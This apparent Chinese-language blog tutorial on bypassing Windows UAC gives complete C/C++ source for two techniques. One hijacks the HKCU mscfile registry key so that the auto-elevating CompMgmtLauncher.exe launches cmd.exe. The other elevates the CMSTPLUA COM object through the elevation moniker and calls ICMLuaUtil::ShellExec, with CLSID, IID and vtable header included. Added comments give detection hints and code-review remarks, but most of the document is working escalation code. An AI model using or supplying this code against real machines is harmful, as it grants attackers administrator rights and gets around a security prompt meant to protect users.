ByPass UAC

ByPass UAC

  • 白名单程序 Bypass UAC

有些系统程序会直接以管理员权限运行而不触发 UAC 弹框，这类程序称为白名单程序，例如 slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe 等。这些白名单程序可以通过 DLL 劫持、注入或修改注册表执行命令的方式启动目标程序，从而实现 Bypass UAC 提权操作。

以 CompMgmtLauncher.exe 为例：该程序在启动时会查询注册表项 "Software\classes\mscfile\shell\open\command"（.msc 后缀文件的默认打开方式），如果该项存在，就会以管理员权限执行其默认值所指定的程序。下面的代码在 HKEY_CURRENT_USER 下创建该项，因此普通用户权限即可写入。

ByPass UAC_第1张图片

#include	
#include	

/* Plants the command that CompMgmtLauncher.exe resolves through
 * HKCU\Software\classes\mscfile\shell\open\command (definition below).
 * Returns FALSE only when no key handle was obtained. */
BOOL	SetReg(char *);

/* Entry point: writes a fixed cmd.exe path into the mscfile command key.
 * The BOOL returned by SetReg is discarded, so failure is not reported,
 * and main relies on the implicit `return 0` of C99. */
int main()
{
	/* String literal bound to a non-const pointer; SetReg only reads it. */
	char *path = "c:\\windows\\system32\\cmd.exe";
	SetReg(path);
}
/*
 * SetReg - store lpszExePath as the default value of the mscfile open command.
 *
 * Creates (or opens) HKCU\Software\classes\mscfile\shell\open\command and
 * writes lpszExePath as the key's default value (a NULL value name selects
 * the default value). Because the key lives under HKEY_CURRENT_USER it is
 * writable without elevation; for that same reason creation of this key by
 * a non-installer process is a high-signal event worth alerting on.
 *
 * @param lpszExePath  NUL-terminated ANSI path written verbatim as REG_SZ.
 * @return FALSE if no key handle was obtained, TRUE otherwise.
 *
 * NOTE(review): the LSTATUS results of RegCreateKeyEx and RegSetValueEx are
 * both discarded, so TRUE is returned even if the value write failed; the
 * NULL test on hKey only works because hKey was pre-initialised to NULL.
 * NOTE(review): lstrlen/RegSetValueEx are TCHAR-generic; with a char* path
 * this only compiles in a non-UNICODE build — confirm project settings.
 */
BOOL	SetReg(char *lpszExePath)
{
	HKEY hKey =	NULL;
	/* KEY_WOW64_64KEY: address the 64-bit registry view; full access requested. */
	RegCreateKeyEx(HKEY_CURRENT_USER,"Software\\classes\\mscfile\\shell\\open\\command",0,NULL,0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if (NULL == hKey)
    {
        return FALSE;
    }
    /* cbData counts the terminating NUL, hence 1 + lstrlen. */
    RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + lstrlen(lpszExePath)));
    
    RegCloseKey(hKey);
    return TRUE;
}

ByPass UAC_第2张图片

  • COM组件接口 Bypass UAC

COM 提升名称（COM Elevation Moniker）技术允许运行在用户账户控制之下的应用程序以提升权限的方式激活 COM 类，从而获得具有更高权限的 COM 接口。因此，基于 ICMLuaUtil 接口的 Bypass UAC 的实现原理是：利用 COM 提升名称对 ICMLuaUtil 接口提权，提权后调用其 ShellExec 方法创建指定进程，实现 Bypass UAC 操作。

//bypassUac.cpp
#include	
#include	
#include	"bypassUac.h"

/* Activates CMSTPLUA through the elevation moniker and runs lpwszExecutable
 * via ICMLuaUtil::ShellExec; TRUE only if both steps report success. */
BOOL CMLuaUtilBypassUAC(LPWSTR );
/* CoGetObject wrapper for "Elevation:Administrator!new:{rclsid}";
 * returns the HRESULT of the formatting or of the activation. */
HRESULT CoCreateInstanceAsAdmin(HWND , REFCLSID , REFIID , PVOID *);


/* Entry point: asks the elevated CMLuaUtil object to start cmd.exe.
 * The BOOL result is discarded and main uses C99's implicit `return 0`. */
int main()
{
	LPWSTR path =L"c:\\windows\\system32\\cmd.exe";
	CMLuaUtilBypassUAC(path);
}

/*
 * CMLuaUtilBypassUAC - launch lpwszExecutable through an elevated CMLuaUtil.
 *
 * Converts CLSID_CMSTPLUA / IID_ICMLuaUtil from their string form, activates
 * the class via the elevation moniker in CoCreateInstanceAsAdmin, and calls
 * the ShellExec slot of the returned ICMLuaUtil with the given path. The
 * do { ... } while(FALSE) wrapper exists only so that `break` reaches the
 * shared Release() cleanup.
 *
 * @param lpwszExecutable  wide path passed unchanged as ShellExec's lpFile.
 * @return TRUE only if both the activation and ShellExec succeeded.
 *
 * Defender note: the observable event is the elevated CMSTPLUA COM server
 * process spawning a child; a low-integrity parent requesting that CLSID
 * through an "Elevation:Administrator!new:" moniker is the thing to detect.
 *
 * NOTE(review): the HRESULTs of CLSIDFromString and IIDFromString are not
 * checked; a malformed string leaves the zero-initialised GUIDs in place and
 * the failure only surfaces later inside CoGetObject.
 */
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    HRESULT hr = 0;
    CLSID clsidICMLuaUtil = { 0 };
    IID iidICMLuaUtil = { 0 };
    ICMLuaUtil *CMLuaUtil = NULL;
    BOOL bRet = FALSE;
    do {
        CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
        IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);

        hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));// elevate CMLuaUtil
        if (FAILED(hr))
        {
            break;
        }

        /* No parameters, no working directory, fMask 0, window shown. */
        hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);// ShellExec method exposed by CMLuaUtil
        if (FAILED(hr))
        {
            break;
        }
        bRet = TRUE;
    }while(FALSE);
    /* CMLuaUtil is non-NULL only if CoGetObject handed back an interface. */
    if (CMLuaUtil) 
    {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }
    return bRet;
}
/*
 * CoCreateInstanceAsAdmin - activate rclsid through the COM elevation moniker.
 *
 * Formats "Elevation:Administrator!new:{CLSID}" and resolves it with
 * CoGetObject, requesting riid into *ppVoid. hWnd is stored in
 * BIND_OPTS3.hwnd (the window COM uses as owner for any UI it shows) and
 * dwClassContext is CLSCTX_LOCAL_SERVER, i.e. an out-of-process activation.
 *
 * @param hWnd    owner window for the binding, may be NULL.
 * @param rclsid  class to activate.
 * @param riid    interface requested on the activated object.
 * @param ppVoid  receives the interface pointer on success.
 * @return the failing HRESULT of StringCchPrintfW, else CoGetObject's result.
 *
 * NOTE(review): CoInitialize is called on every invocation, its return value
 * is ignored, and nothing in this file ever calls CoUninitialize.
 * NOTE(review): wszCLSID and wszMonikerName each hold MAX_PATH WCHARs, yet
 * StringFromGUID2 and StringCchPrintfW are told the capacity is
 * STRSAFE_MAX_CCH, so the "bounded" writes are not bounded by the actual
 * buffers; the sizes should be ARRAYSIZE(wszCLSID) / ARRAYSIZE(wszMonikerName).
 */
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[MAX_PATH] = { 0 };
    WCHAR wszMonikerName[MAX_PATH] = { 0 };
    HRESULT hr = 0;

    CoInitialize(NULL);


    /* Textual "{...}" form of the CLSID, spliced into the moniker below. */
    StringFromGUID2(rclsid, wszCLSID, STRSAFE_MAX_CCH);
    hr = StringCchPrintfW(wszMonikerName,STRSAFE_MAX_CCH, L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
    {
        return hr;
    }

    /* cbStruct must be set so COM knows which BIND_OPTS revision this is. */
    RtlZeroMemory(&bo, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hWnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    hr = CoGetObject(wszMonikerName, &bo, riid, ppVoid);
    return hr;
}


//bypassUac.h
/* NOTE(review): _BYPASS_UAC_H_ (leading underscore + uppercase) is an
 * identifier reserved for the implementation; prefer BYPASS_UAC_H. */
#ifndef _BYPASS_UAC_H_
#define _BYPASS_UAC_H_


/* NOTE(review): the three include targets below appear to have been lost
 * in extraction; the code needs the Windows, COM and strsafe headers. */
#include 
#include 
#include 

/* Auto-elevating CMSTPLUA COM class and its ICMLuaUtil interface, as
 * string GUIDs consumed by CLSIDFromString / IIDFromString. */
#define CLSID_CMSTPLUA                     L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define IID_ICMLuaUtil                     L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/* Hand-written C vtable for ICMLuaUtil; only the ShellExec slot is used. */

typedef interface ICMLuaUtil ICMLuaUtil;

/* Slot order is the interface contract: MethodN entries are unnamed
 * placeholders that exist only to keep ShellExec and
 * SetRegistryStringValue at their correct vtable positions. */
typedef struct ICMLuaUtilVtbl {

	BEGIN_INTERFACE

		/* IUnknown */
		HRESULT(STDMETHODCALLTYPE *QueryInterface)(
		__RPC__in ICMLuaUtil * This,
		__RPC__in REFIID riid,
		  void **ppvObject);

		ULONG(STDMETHODCALLTYPE *AddRef)(
			__RPC__in ICMLuaUtil * This);

		ULONG(STDMETHODCALLTYPE *Release)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method1)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method2)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method3)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method4)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method5)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method6)(
			__RPC__in ICMLuaUtil * This);

		/* Called from CMLuaUtilBypassUAC with lpParameters/lpDirectory NULL.
		 * NOTE(review): lpFile is LPCWSTR while the next two are LPCTSTR;
		 * in a non-UNICODE build those resolve to LPCSTR and the slot
		 * signature no longer matches the wide-only server — confirm. */
		HRESULT(STDMETHODCALLTYPE *ShellExec)(
			__RPC__in ICMLuaUtil * This,
			_In_     LPCWSTR lpFile,
			_In_opt_  LPCTSTR lpParameters,
			_In_opt_  LPCTSTR lpDirectory,
			_In_      ULONG fMask,
			_In_      ULONG nShow
			);

		/* Declared but unused by the code in this file. */
		HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
			__RPC__in ICMLuaUtil * This,
			_In_      HKEY hKey,
			_In_opt_  LPCTSTR lpSubKey,
			_In_opt_  LPCTSTR lpValueName,
			_In_      LPCTSTR lpValueString
			);

		HRESULT(STDMETHODCALLTYPE *Method9)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method10)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method11)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method12)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method13)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method14)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method15)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method16)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method17)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method18)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method19)(
			__RPC__in ICMLuaUtil * This);

		HRESULT(STDMETHODCALLTYPE *Method20)(
			__RPC__in ICMLuaUtil * This);

	END_INTERFACE

} *PICMLuaUtilVtbl;

/* C-style COM object: a single pointer to the vtable above. */
interface ICMLuaUtil
{
	CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};


/* Resolves "Elevation:Administrator!new:{rclsid}" with CoGetObject. */
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid);

/* Runs lpwszExecutable through the elevated ICMLuaUtil::ShellExec. */
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable);


#endif

ByPass UAC_第3张图片
